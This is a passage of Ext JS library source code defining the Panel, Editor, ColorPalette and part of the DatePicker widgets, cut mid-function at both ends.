this.elements += ",header"
}
}
if (this.footerCfg || this.footer === true) {
this.elements += ",footer";
this.footer = null
}
if (this.buttons) {
this.fbar = this.buttons;
this.buttons = null
}
if (this.fbar) {
this.createFbar(this.fbar)
}
if (this.autoLoad) {
this.on("render", this.doAutoLoad, this, {delay:10})
}
}, createFbar:function (b) {
var a = this.minButtonWidth;
this.elements += ",footer";
this.fbar = this.createToolbar(b, {buttonAlign:this.buttonAlign, toolbarCls:"x-panel-fbar", enableOverflow:false, defaults:function (d) {
return{minWidth:d.minWidth || a}
}});
this.fbar.items.each(function (d) {
d.minWidth = d.minWidth || this.minButtonWidth
}, this);
this.buttons = this.fbar.items.items
}, createToolbar:function (b, c) {
var a;
if (Ext.isArray(b)) {
b = {items:b}
}
a = b.events ? Ext.apply(b, c) : this.createComponent(Ext.apply({}, b, c), "toolbar");
this.toolbars.push(a);
return a
}, createElement:function (a, c) {
if (this[a]) {
c.appendChild(this[a].dom);
return
}
if (a === "bwrap" || this.elements.indexOf(a) != -1) {
if (this[a + "Cfg"]) {
this[a] = Ext.fly(c).createChild(this[a + "Cfg"])
} else {
var b = document.createElement("div");
b.className = this[a + "Cls"];
this[a] = Ext.get(c.appendChild(b))
}
if (this[a + "CssClass"]) {
this[a].addClass(this[a + "CssClass"])
}
if (this[a + "Style"]) {
this[a].applyStyles(this[a + "Style"])
}
}
}, onRender:function (g, e) {
Ext.Panel.superclass.onRender.call(this, g, e);
this.createClasses();
var a = this.el, h = a.dom, k, i;
if (this.collapsible && !this.hideCollapseTool) {
this.tools = this.tools ? this.tools.slice(0) : [];
this.tools[this.collapseFirst ? "unshift" : "push"]({id:"toggle", handler:this.toggleCollapse, scope:this})
}
if (this.tools) {
i = this.tools;
this.elements += (this.header !== false) ? ",header" : ""
}
this.tools = {};
a.addClass(this.baseCls);
if (h.firstChild) {
this.header = a.down("." + this.headerCls);
this.bwrap = a.down("." + this.bwrapCls);
var j = this.bwrap ? this.bwrap : a;
this.tbar = j.down("." + this.tbarCls);
this.body = j.down("." + this.bodyCls);
this.bbar = j.down("." + this.bbarCls);
this.footer = j.down("." + this.footerCls);
this.fromMarkup = true
}
if (this.preventBodyReset === true) {
a.addClass("x-panel-reset")
}
if (this.cls) {
a.addClass(this.cls)
}
if (this.buttons) {
this.elements += ",footer"
}
if (this.frame) {
a.insertHtml("afterBegin", String.format(Ext.Element.boxMarkup, this.baseCls));
this.createElement("header", h.firstChild.firstChild.firstChild);
this.createElement("bwrap", h);
k = this.bwrap.dom;
var c = h.childNodes[1], b = h.childNodes[2];
k.appendChild(c);
k.appendChild(b);
var l = k.firstChild.firstChild.firstChild;
this.createElement("tbar", l);
this.createElement("body", l);
this.createElement("bbar", l);
this.createElement("footer", k.lastChild.firstChild.firstChild);
if (!this.footer) {
this.bwrap.dom.lastChild.className += " x-panel-nofooter"
}
this.ft = Ext.get(this.bwrap.dom.lastChild);
this.mc = Ext.get(l)
} else {
this.createElement("header", h);
this.createElement("bwrap", h);
k = this.bwrap.dom;
this.createElement("tbar", k);
this.createElement("body", k);
this.createElement("bbar", k);
this.createElement("footer", k);
if (!this.header) {
this.body.addClass(this.bodyCls + "-noheader");
if (this.tbar) {
this.tbar.addClass(this.tbarCls + "-noheader")
}
}
}
if (Ext.isDefined(this.padding)) {
this.body.setStyle("padding", this.body.addUnits(this.padding))
}
if (this.border === false) {
this.el.addClass(this.baseCls + "-noborder");
this.body.addClass(this.bodyCls + "-noborder");
if (this.header) {
this.header.addClass(this.headerCls + "-noborder")
}
if (this.footer) {
this.footer.addClass(this.footerCls + "-noborder")
}
if (this.tbar) {
this.tbar.addClass(this.tbarCls + "-noborder")
}
if (this.bbar) {
this.bbar.addClass(this.bbarCls + "-noborder")
}
}
if (this.bodyBorder === false) {
this.body.addClass(this.bodyCls + "-noborder")
}
this.bwrap.enableDisplayMode("block");
if (this.header) {
this.header.unselectable();
if (this.headerAsText) {
this.header.dom.innerHTML = '<span class="' + this.headerTextCls + '">' + this.header.dom.innerHTML + "</span>";
if (this.iconCls) {
this.setIconClass(this.iconCls)
}
}
}
if (this.floating) {
this.makeFloating(this.floating)
}
if (this.collapsible && this.titleCollapse && this.header) {
this.mon(this.header, "click", this.toggleCollapse, this);
this.header.setStyle("cursor", "pointer")
}
if (i) {
this.addTool.apply(this, i)
}
if (this.fbar) {
this.footer.addClass("x-panel-btns");
this.fbar.ownerCt = this;
this.fbar.render(this.footer);
this.footer.createChild({cls:"x-clear"})
}
if (this.tbar && this.topToolbar) {
this.topToolbar.ownerCt = this;
this.topToolbar.render(this.tbar)
}
if (this.bbar && this.bottomToolbar) {
this.bottomToolbar.ownerCt = this;
this.bottomToolbar.render(this.bbar)
}
}, setIconClass:function (b) {
var a = this.iconCls;
this.iconCls = b;
if (this.rendered && this.header) {
if (this.frame) {
this.header.addClass("x-panel-icon");
this.header.replaceClass(a, this.iconCls)
} else {
var e = this.header, c = e.child("img.x-panel-inline-icon");
if (c) {
Ext.fly(c).replaceClass(a, this.iconCls)
} else {
var d = e.child("span." + this.headerTextCls);
if (d) {
Ext.DomHelper.insertBefore(d.dom, {tag:"img", alt:"", src:Ext.BLANK_IMAGE_URL, cls:"x-panel-inline-icon " + this.iconCls})
}
}
}
}
this.fireEvent("iconchange", this, b, a)
}, makeFloating:function (a) {
this.floating = true;
this.el = new Ext.Layer(Ext.apply({}, a, {shadow:Ext.isDefined(this.shadow) ? this.shadow : "sides", shadowOffset:this.shadowOffset, constrain:false, shim:this.shim === false ? false : undefined}), this.el)
}, getTopToolbar:function () {
return this.topToolbar
}, getBottomToolbar:function () {
return this.bottomToolbar
}, getFooterToolbar:function () {
return this.fbar
}, addButton:function (a, c, b) {
if (!this.fbar) {
this.createFbar([])
}
if (c) {
if (Ext.isString(a)) {
a = {text:a}
}
a = Ext.apply({handler:c, scope:b}, a)
}
return this.fbar.add(a)
}, addTool:function () {
if (!this.rendered) {
if (!this.tools) {
this.tools = []
}
Ext.each(arguments, function (a) {
this.tools.push(a)
}, this);
return
}
if (!this[this.toolTarget]) {
return
}
if (!this.toolTemplate) {
var h = new Ext.Template('<div class="x-tool x-tool-{id}"> </div>');
h.disableFormats = true;
h.compile();
Ext.Panel.prototype.toolTemplate = h
}
for (var g = 0, d = arguments, c = d.length; g < c; g++) {
var b = d[g];
if (!this.tools[b.id]) {
var j = "x-tool-" + b.id + "-over";
var e = this.toolTemplate.insertFirst(this[this.toolTarget], b, true);
this.tools[b.id] = e;
e.enableDisplayMode("block");
this.mon(e, "click", this.createToolHandler(e, b, j, this));
if (b.on) {
this.mon(e, b.on)
}
if (b.hidden) {
e.hide()
}
if (b.qtip) {
if (Ext.isObject(b.qtip)) {
Ext.QuickTips.register(Ext.apply({target:e.id}, b.qtip))
} else {
e.dom.qtip = b.qtip
}
}
e.addClassOnOver(j)
}
}
}, onLayout:function (b, a) {
Ext.Panel.superclass.onLayout.apply(this, arguments);
if (this.hasLayout && this.toolbars.length > 0) {
Ext.each(this.toolbars, function (c) {
c.doLayout(undefined, a)
});
this.syncHeight()
}
}, syncHeight:function () {
var b = this.toolbarHeight, c = this.body, a = this.lastSize.height, d;
if (this.autoHeight || !Ext.isDefined(a) || a == "auto") {
return
}
if (b != this.getToolbarHeight()) {
b = Math.max(0, a - this.getFrameHeight());
c.setHeight(b);
d = c.getSize();
this.toolbarHeight = this.getToolbarHeight();
this.onBodyResize(d.width, d.height)
}
}, onShow:function () {
if (this.floating) {
return this.el.show()
}
Ext.Panel.superclass.onShow.call(this)
}, onHide:function () {
if (this.floating) {
return this.el.hide()
}
Ext.Panel.superclass.onHide.call(this)
}, createToolHandler:function (c, a, d, b) {
return function (g) {
c.removeClass(d);
if (a.stopEvent !== false) {
g.stopEvent()
}
if (a.handler) {
a.handler.call(a.scope || c, g, c, b, a)
}
}
}, afterRender:function () {
if (this.floating && !this.hidden) {
this.el.show()
}
if (this.title) {
this.setTitle(this.title)
}
Ext.Panel.superclass.afterRender.call(this);
if (this.collapsed) {
this.collapsed = false;
this.collapse(false)
}
this.initEvents()
}, getKeyMap:function () {
if (!this.keyMap) {
this.keyMap = new Ext.KeyMap(this.el, this.keys)
}
return this.keyMap
}, initEvents:function () {
if (this.keys) {
this.getKeyMap()
}
if (this.draggable) {
this.initDraggable()
}
if (this.toolbars.length > 0) {
Ext.each(this.toolbars, function (a) {
a.doLayout();
a.on({scope:this, afterlayout:this.syncHeight, remove:this.syncHeight})
}, this);
this.syncHeight()
}
}, initDraggable:function () {
this.dd = new Ext.Panel.DD(this, Ext.isBoolean(this.draggable) ? null : this.draggable)
}, beforeEffect:function (a) {
if (this.floating) {
this.el.beforeAction()
}
if (a !== false) {
this.el.addClass("x-panel-animated")
}
}, afterEffect:function (a) {
this.syncShadow();
this.el.removeClass("x-panel-animated")
}, createEffect:function (c, b, d) {
var e = {scope:d, block:true};
if (c === true) {
e.callback = b;
return e
} else {
if (!c.callback) {
e.callback = b
} else {
e.callback = function () {
b.call(d);
Ext.callback(c.callback, c.scope)
}
}
}
return Ext.applyIf(e, c)
}, collapse:function (b) {
if (this.collapsed || this.el.hasFxBlock() || this.fireEvent("beforecollapse", this, b) === false) {
return
}
var a = b === true || (b !== false && this.animCollapse);
this.beforeEffect(a);
this.onCollapse(a, b);
return this
}, onCollapse:function (a, b) {
if (a) {
this[this.collapseEl].slideOut(this.slideAnchor, Ext.apply(this.createEffect(b || true, this.afterCollapse, this), this.collapseDefaults))
} else {
this[this.collapseEl].hide(this.hideMode);
this.afterCollapse(false)
}
}, afterCollapse:function (a) {
this.collapsed = true;
this.el.addClass(this.collapsedCls);
if (a !== false) {
this[this.collapseEl].hide(this.hideMode)
}
this.afterEffect(a);
this.cascade(function (b) {
if (b.lastSize) {
b.lastSize = {width:undefined, height:undefined}
}
});
this.fireEvent("collapse", this)
}, expand:function (b) {
if (!this.collapsed || this.el.hasFxBlock() || this.fireEvent("beforeexpand", this, b) === false) {
return
}
var a = b === true || (b !== false && this.animCollapse);
this.el.removeClass(this.collapsedCls);
this.beforeEffect(a);
this.onExpand(a, b);
return this
}, onExpand:function (a, b) {
if (a) {
this[this.collapseEl].slideIn(this.slideAnchor, Ext.apply(this.createEffect(b || true, this.afterExpand, this), this.expandDefaults))
} else {
this[this.collapseEl].show(this.hideMode);
this.afterExpand(false)
}
}, afterExpand:function (a) {
this.collapsed = false;
if (a !== false) {
this[this.collapseEl].show(this.hideMode)
}
this.afterEffect(a);
if (this.deferLayout) {
delete this.deferLayout;
this.doLayout(true)
}
this.fireEvent("expand", this)
}, toggleCollapse:function (a) {
this[this.collapsed ? "expand" : "collapse"](a);
return this
}, onDisable:function () {
if (this.rendered && this.maskDisabled) {
this.el.mask()
}
Ext.Panel.superclass.onDisable.call(this)
}, onEnable:function () {
if (this.rendered && this.maskDisabled) {
this.el.unmask()
}
Ext.Panel.superclass.onEnable.call(this)
}, onResize:function (g, d, c, e) {
var a = g, b = d;
if (Ext.isDefined(a) || Ext.isDefined(b)) {
if (!this.collapsed) {
if (Ext.isNumber(a)) {
this.body.setWidth(a = this.adjustBodyWidth(a - this.getFrameWidth()))
} else {
if (a == "auto") {
a = this.body.setWidth("auto").dom.offsetWidth
} else {
a = this.body.dom.offsetWidth
}
}
if (this.tbar) {
this.tbar.setWidth(a);
if (this.topToolbar) {
this.topToolbar.setSize(a)
}
}
if (this.bbar) {
this.bbar.setWidth(a);
if (this.bottomToolbar) {
this.bottomToolbar.setSize(a);
if (Ext.isIE) {
this.bbar.setStyle("position", "static");
this.bbar.setStyle("position", "")
}
}
}
if (this.footer) {
this.footer.setWidth(a);
if (this.fbar) {
this.fbar.setSize(Ext.isIE ? (a - this.footer.getFrameWidth("lr")) : "auto")
}
}
if (Ext.isNumber(b)) {
b = Math.max(0, b - this.getFrameHeight());
this.body.setHeight(b)
} else {
if (b == "auto") {
this.body.setHeight(b)
}
}
if (this.disabled && this.el._mask) {
this.el._mask.setSize(this.el.dom.clientWidth, this.el.getHeight())
}
} else {
this.queuedBodySize = {width:a, height:b};
if (!this.queuedExpand && this.allowQueuedExpand !== false) {
this.queuedExpand = true;
this.on("expand", function () {
delete this.queuedExpand;
this.onResize(this.queuedBodySize.width, this.queuedBodySize.height)
}, this, {single:true})
}
}
this.onBodyResize(a, b)
}
this.syncShadow();
Ext.Panel.superclass.onResize.call(this, g, d, c, e)
}, onBodyResize:function (a, b) {
this.fireEvent("bodyresize", this, a, b)
}, getToolbarHeight:function () {
var a = 0;
if (this.rendered) {
Ext.each(this.toolbars, function (b) {
a += b.getHeight()
}, this)
}
return a
}, adjustBodyHeight:function (a) {
return a
}, adjustBodyWidth:function (a) {
return a
}, onPosition:function () {
this.syncShadow()
}, getFrameWidth:function () {
var b = this.el.getFrameWidth("lr") + this.bwrap.getFrameWidth("lr");
if (this.frame) {
var a = this.bwrap.dom.firstChild;
b += (Ext.fly(a).getFrameWidth("l") + Ext.fly(a.firstChild).getFrameWidth("r"));
b += this.mc.getFrameWidth("lr")
}
return b
}, getFrameHeight:function () {
var a = this.el.getFrameWidth("tb") + this.bwrap.getFrameWidth("tb");
a += (this.tbar ? this.tbar.getHeight() : 0) + (this.bbar ? this.bbar.getHeight() : 0);
if (this.frame) {
a += this.el.dom.firstChild.offsetHeight + this.ft.dom.offsetHeight + this.mc.getFrameWidth("tb")
} else {
a += (this.header ? this.header.getHeight() : 0) + (this.footer ? this.footer.getHeight() : 0)
}
return a
}, getInnerWidth:function () {
return this.getSize().width - this.getFrameWidth()
}, getInnerHeight:function () {
return this.body.getHeight()
}, syncShadow:function () {
if (this.floating) {
this.el.sync(true)
}
}, getLayoutTarget:function () {
return this.body
}, getContentTarget:function () {
return this.body
}, setTitle:function (b, a) {
this.title = b;
if (this.header && this.headerAsText) {
this.header.child("span").update(b)
}
if (a) {
this.setIconClass(a)
}
this.fireEvent("titlechange", this, b);
return this
}, getUpdater:function () {
return this.body.getUpdater()
}, load:function () {
var a = this.body.getUpdater();
a.update.apply(a, arguments);
return this
}, beforeDestroy:function () {
Ext.Panel.superclass.beforeDestroy.call(this);
if (this.header) {
this.header.removeAllListeners()
}
if (this.tools) {
for (var a in this.tools) {
Ext.destroy(this.tools[a])
}
}
if (this.toolbars.length > 0) {
Ext.each(this.toolbars, function (b) {
b.un("afterlayout", this.syncHeight, this);
b.un("remove", this.syncHeight, this)
}, this)
}
if (Ext.isArray(this.buttons)) {
while (this.buttons.length) {
Ext.destroy(this.buttons[0])
}
}
if (this.rendered) {
Ext.destroy(this.ft, this.header, this.footer, this.tbar, this.bbar, this.body, this.mc, this.bwrap, this.dd);
if (this.fbar) {
Ext.destroy(this.fbar, this.fbar.el)
}
}
Ext.destroy(this.toolbars)
}, createClasses:function () {
this.headerCls = this.baseCls + "-header";
this.headerTextCls = this.baseCls + "-header-text";
this.bwrapCls = this.baseCls + "-bwrap";
this.tbarCls = this.baseCls + "-tbar";
this.bodyCls = this.baseCls + "-body";
this.bbarCls = this.baseCls + "-bbar";
this.footerCls = this.baseCls + "-footer"
}, createGhost:function (a, e, b) {
var d = document.createElement("div");
d.className = "x-panel-ghost " + (a ? a : "");
if (this.header) {
d.appendChild(this.el.dom.firstChild.cloneNode(true))
}
Ext.fly(d.appendChild(document.createElement("ul"))).setHeight(this.bwrap.getHeight());
d.style.width = this.el.dom.offsetWidth + "px";
if (!b) {
this.container.dom.appendChild(d)
} else {
Ext.getDom(b).appendChild(d)
}
if (e !== false && this.el.useShim !== false) {
var c = new Ext.Layer({shadow:false, useDisplay:true, constrain:false}, d);
c.show();
return c
} else {
return new Ext.Element(d)
}
}, doAutoLoad:function () {
var a = this.body.getUpdater();
if (this.renderer) {
a.setRenderer(this.renderer)
}
a.update(Ext.isObject(this.autoLoad) ? this.autoLoad : {url:this.autoLoad})
}, getTool:function (a) {
return this.tools[a]
}});
Ext.reg("panel", Ext.Panel);
Ext.Editor = function (b, a) {
if (b.field) {
this.field = Ext.create(b.field, "textfield");
a = Ext.apply({}, b);
delete a.field
} else {
this.field = b
}
Ext.Editor.superclass.constructor.call(this, a)
};
Ext.extend(Ext.Editor, Ext.Component, {allowBlur:true, value:"", alignment:"c-c?", offsets:[0, 0], shadow:"frame", constrain:false, swallowKeys:true, completeOnEnter:true, cancelOnEsc:true, updateEl:false, initComponent:function () {
Ext.Editor.superclass.initComponent.call(this);
this.addEvents("beforestartedit", "startedit", "beforecomplete", "complete", "canceledit", "specialkey")
}, onRender:function (b, a) {
this.el = new Ext.Layer({shadow:this.shadow, cls:"x-editor", parentEl:b, shim:this.shim, shadowOffset:this.shadowOffset || 4, id:this.id, constrain:this.constrain});
if (this.zIndex) {
this.el.setZIndex(this.zIndex)
}
this.el.setStyle("overflow", Ext.isGecko ? "auto" : "hidden");
if (this.field.msgTarget != "title") {
this.field.msgTarget = "qtip"
}
this.field.inEditor = true;
this.mon(this.field, {scope:this, blur:this.onBlur, specialkey:this.onSpecialKey});
if (this.field.grow) {
this.mon(this.field, "autosize", this.el.sync, this.el, {delay:1})
}
this.field.render(this.el).show();
this.field.getEl().dom.name = "";
if (this.swallowKeys) {
this.field.el.swallowEvent(["keypress", "keydown"])
}
}, onSpecialKey:function (g, d) {
var b = d.getKey(), a = this.completeOnEnter && b == d.ENTER, c = this.cancelOnEsc && b == d.ESC;
if (a || c) {
d.stopEvent();
if (a) {
this.completeEdit()
} else {
this.cancelEdit()
}
if (g.triggerBlur) {
g.triggerBlur()
}
}
this.fireEvent("specialkey", g, d)
}, startEdit:function (b, c) {
if (this.editing) {
this.completeEdit()
}
this.boundEl = Ext.get(b);
var a = c !== undefined ? c : this.boundEl.dom.innerHTML;
if (!this.rendered) {
this.render(this.parentEl || document.body)
}
if (this.fireEvent("beforestartedit", this, this.boundEl, a) !== false) {
this.startValue = a;
this.field.reset();
this.field.setValue(a);
this.realign(true);
this.editing = true;
this.show()
}
}, doAutoSize:function () {
if (this.autoSize) {
var b = this.boundEl.getSize(), a = this.field.getSize();
switch (this.autoSize) {
case"width":
this.setSize(b.width, a.height);
break;
case"height":
this.setSize(a.width, b.height);
break;
case"none":
this.setSize(a.width, a.height);
break;
default:
this.setSize(b.width, b.height)
}
}
}, setSize:function (a, b) {
delete this.field.lastSize;
this.field.setSize(a, b);
if (this.el) {
if (Ext.isGecko2 || Ext.isOpera || (Ext.isIE7 && Ext.isStrict)) {
this.el.setSize(a, b)
}
this.el.sync()
}
}, realign:function (a) {
if (a === true) {
this.doAutoSize()
}
this.el.alignTo(this.boundEl, this.alignment, this.offsets)
}, completeEdit:function (a) {
if (!this.editing) {
return
}
if (this.field.assertValue) {
this.field.assertValue()
}
var b = this.getValue();
if (!this.field.isValid()) {
if (this.revertInvalid !== false) {
this.cancelEdit(a)
}
return
}
if (String(b) === String(this.startValue) && this.ignoreNoChange) {
this.hideEdit(a);
return
}
if (this.fireEvent("beforecomplete", this, b, this.startValue) !== false) {
b = this.getValue();
if (this.updateEl && this.boundEl) {
this.boundEl.update(b)
}
this.hideEdit(a);
this.fireEvent("complete", this, b, this.startValue)
}
}, onShow:function () {
this.el.show();
if (this.hideEl !== false) {
this.boundEl.hide()
}
this.field.show().focus(false, true);
this.fireEvent("startedit", this.boundEl, this.startValue)
}, cancelEdit:function (a) {
if (this.editing) {
var b = this.getValue();
this.setValue(this.startValue);
this.hideEdit(a);
this.fireEvent("canceledit", this, b, this.startValue)
}
}, hideEdit:function (a) {
if (a !== true) {
this.editing = false;
this.hide()
}
}, onBlur:function () {
if (this.allowBlur === true && this.editing && this.selectSameEditor !== true) {
this.completeEdit()
}
}, onHide:function () {
if (this.editing) {
this.completeEdit();
return
}
this.field.blur();
if (this.field.collapse) {
this.field.collapse()
}
this.el.hide();
if (this.hideEl !== false) {
this.boundEl.show()
}
}, setValue:function (a) {
this.field.setValue(a)
}, getValue:function () {
return this.field.getValue()
}, beforeDestroy:function () {
Ext.destroyMembers(this, "field");
delete this.parentEl;
delete this.boundEl
}});
Ext.reg("editor", Ext.Editor);
Ext.ColorPalette = Ext.extend(Ext.Component, {itemCls:"x-color-palette", value:null, clickEvent:"click", ctype:"Ext.ColorPalette", allowReselect:false, colors:["000000", "993300", "333300", "003300", "003366", "000080", "333399", "333333", "800000", "FF6600", "808000", "008000", "008080", "0000FF", "666699", "808080", "FF0000", "FF9900", "99CC00", "339966", "33CCCC", "3366FF", "800080", "969696", "FF00FF", "FFCC00", "FFFF00", "00FF00", "00FFFF", "00CCFF", "993366", "C0C0C0", "FF99CC", "FFCC99", "FFFF99", "CCFFCC", "CCFFFF", "99CCFF", "CC99FF", "FFFFFF"], initComponent:function () {
Ext.ColorPalette.superclass.initComponent.call(this);
this.addEvents("select");
if (this.handler) {
this.on("select", this.handler, this.scope, true)
}
}, onRender:function (b, a) {
this.autoEl = {tag:"div", cls:this.itemCls};
Ext.ColorPalette.superclass.onRender.call(this, b, a);
var c = this.tpl || new Ext.XTemplate('<tpl for="."><a href="#" class="color-{.}" hidefocus="on"><em><span style="background:#{.}" unselectable="on"> </span></em></a></tpl>');
c.overwrite(this.el, this.colors);
this.mon(this.el, this.clickEvent, this.handleClick, this, {delegate:"a"});
if (this.clickEvent != "click") {
this.mon(this.el, "click", Ext.emptyFn, this, {delegate:"a", preventDefault:true})
}
}, afterRender:function () {
Ext.ColorPalette.superclass.afterRender.call(this);
if (this.value) {
var a = this.value;
this.value = null;
this.select(a, true)
}
}, handleClick:function (b, a) {
b.preventDefault();
if (!this.disabled) {
var d = a.className.match(/(?:^|\s)color-(.{6})(?:\s|$)/)[1];
this.select(d.toUpperCase())
}
}, select:function (b, a) {
b = b.replace("#", "");
if (b != this.value || this.allowReselect) {
var c = this.el;
if (this.value) {
c.child("a.color-" + this.value).removeClass("x-color-palette-sel")
}
c.child("a.color-" + b).addClass("x-color-palette-sel");
this.value = b;
if (a !== true) {
this.fireEvent("select", this, b)
}
}
}});
Ext.reg("colorpalette", Ext.ColorPalette);
Ext.DatePicker = Ext.extend(Ext.BoxComponent, {todayText:"Today", okText:" OK ", cancelText:"Cancel", todayTip:"{0} (Spacebar)", minText:"This date is before the minimum date", maxText:"This date is after the maximum date", format:"m/d/y", disabledDaysText:"Disabled", disabledDatesText:"Disabled", monthNames:Date.monthNames, dayNames:Date.dayNames, nextText:"Next Month (Control+Right)", prevText:"Previous Month (Control+Left)", monthYearText:"Choose a month (Control+Up/Down to move years)", startDay:0, showToday:true, focusOnSelect:true, initHour:12, initComponent:function () {
Ext.DatePicker.superclass.initComponent.call(this);
this.value = this.value ? this.value.clearTime(true) : new Date().clearTime();
this.addEvents("select");
if (this.handler) {
this.on("select", this.handler, this.scope || this)
}
this.initDisabledDays()
}, initDisabledDays:function () {
if (!this.disabledDatesRE && this.disabledDates) {
var b = this.disabledDates, a = b.length - 1, c = "(?:";
Ext.each(b, function (g, e) {
c += Ext.isDate(g) ? "^" + Ext.escapeRe(g.dateFormat(this.format)) + "$" : b[e];
if (e != a) {
c += "|"
}
}, this);
this.disabledDatesRE = new RegExp(c + ")")
}
}, setDisabledDates:function (a) {
if (Ext.isArray(a)) {
this.disabledDates = a;
this.disabledDatesRE = null
} else {
this.disabledDatesRE = a
}
this.initDisabledDays();
this.update(this.value, true)
}, setDisabledDays:function (a) {
this.disabledDays = a;
this.update(this.value, true)
}, setMinDate:function (a) {
this.minDate = a;
this.update(this.value, true)
}, setMaxDate:function (a) {
this.maxDate = a;
this.update(this.value, true)
}, setValue:function (a) {
this.value = a.clearTime(true);
this.update(this.value)
}, getValue:function () {
return this.value
}, focus:function () {
this.update(this.activeDate)
}, onEnable:function (a) {
Ext.DatePicker.superclass.onEnable.call(this);
this.doDisabled(false);
this.update(a ? this.value : this.activeDate);
if (Ext.isIE) {
this.el.repaint()
}
}, onDisable:function () {
Ext.DatePicker.superclass.onDisable.call(this);
this.doDisabled(true);
if (Ext.isIE && !Ext.isIE8) {
Ext.each([].concat(this.textNodes, this.el.query("th span")), function (a) {
Ext.fly(a).repaint()
})
}
}, doDisabled:function (a) {
this.keyNav.setDisabled(a);
this.prevRepeater.setDisabled(a);
this.nextRepeater.setDisabled(a);
if (this.showToday) {
this.todayKeyListener.setDisabled(a);
this.todayBtn.setDisabled(a)
}
}, onRender:function (e, b) {
var a = ['<table cellspacing="0">', '<tr><td class="x-date-left"><a href="#" title="', this.prevText, '"> </a></td><td class="x-date-middle" align="center"></td><td class="x-date-right"><a href="#" title="', this.nextText, '"> </a></td></tr>', '<tr><td colspan="3"><table class="x-date-inner" cellspacing="0"><thead><tr>'], c = this.dayNames, h;
for (h = 0; h < 7; h++) {
var k = this.startDay + h;
if (k > 6) {
k = k - 7
}
a.push("<th><span>", c[k].substr(0, 1), "</span></th>")
}
a[a.length] = "</tr></thead><tbody><tr>";
for (h = 0; h < 42; h++) {
if (h % 7 === 0 && h !== 0) {
a[a.length] = "</tr><tr>"
}
a[a.length] = '<td><a href="#" hidefocus="on" class="x-date-date" tabIndex="1"><em><span></span></em></a></td>'
}
a.push("</tr></tbody></table></td></tr>", this.showToday ? '<tr><td colspan="3" class="x-date-bottom" align="center"></td></tr>' : "", '</table><div class="x-date-mp"></div>');
var j = document.createElement("div");
j.className = "x-date-picker";
j.innerHTML = a.join("");
e.dom.insertBefore(j, b);
this.el = Ext.get(j);
this.eventEl = Ext.get(j.firstChild);
this.prevRepeater = new Ext.util.ClickRepeater(this.el.child("td.x-date-left a"), {handler:this.showPrevMonth, scope:this, preventDefault:true, stopDefault:true});
this.nextRepeater = new Ext.util.ClickRepeater(this.el.child("td.x-date-right a"), {handler:this.showNextMonth, scope:this, preventDefault:true, stopDefault:true});
this.monthPicker = this.el.down("div.x-date-mp");
this.monthPicker.enableDisplayMode("block");
this.keyNav = new Ext.KeyNav(this.eventEl, {left:function (d) {
if (d.ctrlKey) {
this.showPrevMonth()
} else {
this.update(this.activeDate.add("d", -1))
}
}, right:function (d) {
if (d.ctrlKey) {
this.showNextMonth()
} else {
this.update(this.activeDate.add("d", 1))
}
}, up:function (d) {
if (d.ctrlKey) {
this.showNextYear()
} else {
this.update(this.activeDate.add("d", -7))
}
}, down:function (d) {
if (d.ctrlKey) {
this.showPrevYear()
} else {
this.update(this.activeDate.add("d", 7))
}
}, pageUp:function (d) {
this.showNextMonth()
}, pageDown:function (d) {
this.showPrevMonth()
}, enter:function (d) {
d.stopPropagation();
return true
}, scope:this});
this.el.unselectable();
this.cells = this.el.select("table.x-date-inner tbody td");
this.textNodes = this.el.query("table.x-date-inner tbody span");
this.mbtn = new Ext.Button({text:" ", tooltip:this.monthYearText, renderTo:this.el.child("td.x-date-middle", true)});
this.mbtn.el.child("em").addClass("x-btn-arrow");
if (this.showToday) {
this.todayKeyListener = this.eventEl.addKeyListener(Ext.EventObject.SPACE, this.selectToday, this);
var g = (new Date()).dateFormat(this.format);
this.todayBtn = new Ext.Button({renderTo:this.el.child("td.x-date-bottom", true), text:String.format(this.todayText, g), tooltip:String.format(this.todayTip, g), handler:this.selectToday, scope:this})
}
this.mon(this.eventEl, "mousewheel", this.handleMouseWheel, this);
this.mon(this.eventEl, "click", this.handleDateClick, this, {delegate:"a.x-date-date"});
this.mon(this.mbtn, "click", this.showMonthPicker, this);
this.onEnable(true)
}, createMonthPicker:function () {
if (!this.monthPicker.dom.firstChild) {
var a = ['<table border="0" cellspacing="0">'];
for (var b = 0; b < 6; b++) {
a.push('<tr><td class="x-date-mp-month"><a href="#">', Date.getShortMonthName(b), "</a></td>", '<td class="x-date-mp-month x-date-mp-sep"><a href="#">', Date.getShortMonthName(b + 6), "</a></td>", b === 0 ? '<td class="x-date-mp-ybtn" align="center"><a class="x-date-mp-prev"></a></td><td class="x-date-mp-ybtn" align="center"><a class="x-date-mp-next"></a></td></tr>' : '<td class="x-date-mp-year"><a href="#"></a></td><td class="x-date-mp-year"><a href="#"></a></td></tr>')
}
a.push('<tr class="x-date-mp-btns"><td colspan="4"><button type="button" class="x-date-mp-ok">', this.okText, '</button><button type="button" class="x-date-mp-cancel">', this.cancelText, "</button></td></tr>", "</table>");
this.monthPicker.update(a.join(""));
this.mon(this.monthPicker, "click", this.onMonthClick, this);
this.mon(this.monthPicker, "dblclick", this.onMonthDblClick, this);
this.mpMonths = this.monthPicker.select("td.x-date-mp-month");
this.mpYears = this.monthPicker.select("td.x-date-mp-year");
this.mpMonths.each(function (c, d, e) {
e += 1;
if ((e % 2) === 0) {
c.dom.xmonth = 5 + Math.round(e * 0.5)
} else {
c.dom.xmonth = Math.round((e - 1) * 0.5)
}
})
}
}, showMonthPicker:function () {
if (!this.disabled) {
this.createMonthPicker();
var a = this.el.getSize();
this.monthPicker.setSize(a);
this.monthPicker.child("table").setSize(a);
this.mpSelMonth = (this.activeDate || this.value).getMonth();
this.updateMPMonth(this.mpSelMonth);
this.mpSelYear = (this.activeDate || this.value).getFullYear();
this.updateMPYear(this.mpSelYear);
this.monthPicker.slideIn("t", {duration:0.2})
}
}, updateMPYear:function (e) {
this.mpyear = e;
var c = this.mpYears.elements;
for (var b = 1; b <= 10; b++) {
var d = c[b - 1], a;
if ((b % 2) === 0) {
a = e + Math.round(b * 0.5);
d.firstChild.innerHTML = a;
d.xyear = a
} else {
a = e - (5 - Math.round(b * 0.5));
d.firstChild.innerHTML = a;
d.xyear = a
}
this.mpYears.item(b - 1)[a == this.mpSelYear ? "addClass" : "removeClass"]("x-date-mp-sel")
}
}, updateMPMonth:function (a) {
this.mpMonths.each(function (b, c, d) {
b[b.dom.xmonth == a ? "addClass" : "removeClass"]("x-date-mp-sel")
})
}, selectMPMonth:function (a) {
}, onMonthClick:function (g, b) {
g.stopEvent();
var c = new Ext.Element(b), a;
if (c.is("button.x-date-mp-cancel")) {
this.hideMonthPicker()
} else {
if (c.is("button.x-date-mp-ok")) {
